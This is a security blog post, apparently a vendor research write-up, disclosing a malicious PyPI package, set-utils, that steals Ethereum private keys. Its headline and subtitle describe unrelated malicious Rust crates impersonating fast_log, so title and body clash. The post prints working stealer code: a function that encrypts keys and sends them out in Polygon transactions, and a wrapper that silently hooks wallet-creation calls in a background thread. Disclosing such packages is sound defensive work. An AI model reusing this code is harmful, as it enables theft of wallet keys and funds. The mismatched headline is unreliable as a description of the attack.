
Research
Two Malicious Rust Crates Impersonate Popular Logger to Steal Wallet Keys
Socket uncovers malicious Rust crates impersonating fast_log to steal Solana and Ethereum wallet keys from source code.
Socket Research Team
March 5, 2025
The Socket Research Team has discovered a malicious PyPI package, set-utils
, designed to steal Ethereum private keys by exploiting commonly used account creation functions. Disguised as a simple utility for Python sets, the package mimics widely used libraries like python-utils
(712M+ downloads) and utils
(23.5M+ downloads). This deception tricks unsuspecting developers into installing the compromised package, granting attackers unauthorized access to Ethereum wallets.
Since January 29, 2025, set-utils
has been downloaded more than +1,000 times, putting Ethereum users and developers at risk. The package specifically targets those working with blockchain technology, particularly developers using Python-based wallet management libraries such as eth-account
. By intercepting Ethereum account creation, the package exfiltrates private keys via the blockchain by abusing https://rpc-amoy.polygon.technology/
as a Command and Control (C2) server. This allows attackers to extract stolen credentials in a stealthy manner.
This attack primarily targets Ethereum developers and organizations working with Python-based blockchain applications, including the following:
eth-account
for wallet creation and management.Anyone who has installed the package risks exposing their private keys to attackers, potentially leading to significant financial losses.
The consequences of this attack include:
rpc-amoy.polygon.technology/
) as a C2 channel: Instead of using traditional network exfiltration, stolen data is hidden within blockchain transactions, making detection much harder.set-utils
is uninstalled, any Ethereum wallets created while it was active are already exposed and compromised.The first part of the malicious script defines an attacker-controlled RSA public key and Ethereum wallet address, which are used for encrypting and transmitting the stolen private keys.
pycrypto_pubkey = b"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoE/n0a0nNk3hGlDv+ypQ\n8Vk/xHpjYD6LpFYLmBBv4fg5ScckQwDweOKTLmN12cC2EWlpIiiS6u3Zqdph6L34\nO/ec1v9E+4yk02d0ttSwNDMaUzaGXaZaHv1N8ln+KYFaQjx+HvGlEDpDAxEElowB\nmsYv9ZOX/AUFvmL9Ug6ZqcN4/7ISV45c20dukWsH46qbVPyIh3ppOXdtAG13Bqxo\nDN+uKvD7XaC1DOWepWEXYKyIIre5gR0U5Un0v44YWQaQIPruWrYpKl8acKrAuHiQ\nUZdGKxmJlRyUUAAEVhYodW3kw0KAWZgcUDYkfJg2eCEXV4rx/CtTSEvPmPeU7FV9\nIQIDAQAB\n-----END PUBLIC KEY-----"
cipher = PKCS1_OAEP.new(RSA.import_key(pycrypto_pubkey))
sender_account = Account.from_key(
"0xa3a1d8ee43adc1024b2407b2230e018bd1752ebc819b8abe873b8a3aa5acaee3"
)
The core function responsible for exfiltrating stolen private keys is transmit()
. It encrypts the private key and sends it within an Ethereum transaction via the Polygon RPC endpoint rpc-amoy.polygon.technology/
.
def transmit(acct):
try:
from web3 import Web3
from hexbytes import HexBytes
web3 = Web3(Web3.HTTPProvider("https://rpc-amoy.polygon.technology/"))
transaction = {
"value": 0,
"nonce": web3.eth.get_transaction_count(sender_account.address),
"gas": 60000,
"gasPrice": web3.eth.gas_price,
"chainId": web3.eth.chain_id,
"data": cipher.encrypt(acct.key),
}
(
v,
r,
s,
encoded_transaction,
) = sign_transaction_dict(acct._key_obj, transaction, blobs=None)
tx_hash = web3.eth.send_raw_transaction(HexBytes(encoded_transaction))
except:
pass
The package silently modifies standard Ethereum wallet creation functions, wrapping from_key()
and from_mnemonic()
to exfiltrate credentials in the background.
def augment_func(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
acct = func(self, *args, **kwargs)
threading.Thread(target=transmit, args=(acct,), daemon=True).start()
return acct
return wrapper
This ensures that even when a user successfully creates an Ethereum account, their private key is stolen and transmitted to the attacker. The malicious function runs in a background thread, making detection even more difficult.
To mitigate these risks, developers and organizations must take proactive measures to secure their software supply chains. Regular dependency audits and automated scanning tools should be employed to detect anomalous or malicious behaviors in third-party packages before they are integrated into production environments.
By integrating these security measures into development workflows, organizations can significantly reduce the likelihood of supply chain attacks. We have reported this malicious package to the PyPI team, and it was promptly removed to prevent further attacks.
Dhanesh Dodia
Sambarathi Sai
Dwijay Chintakunta
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Research
Socket uncovers malicious Rust crates impersonating fast_log to steal Solana and Ethereum wallet keys from source code.
Research
A malicious package uses a QR code as steganography in an innovative technique.
Research
/Security News
Socket identified 80 fake candidates targeting engineering roles, including suspected North Korean operators, exposing the new reality of hiring as a security function.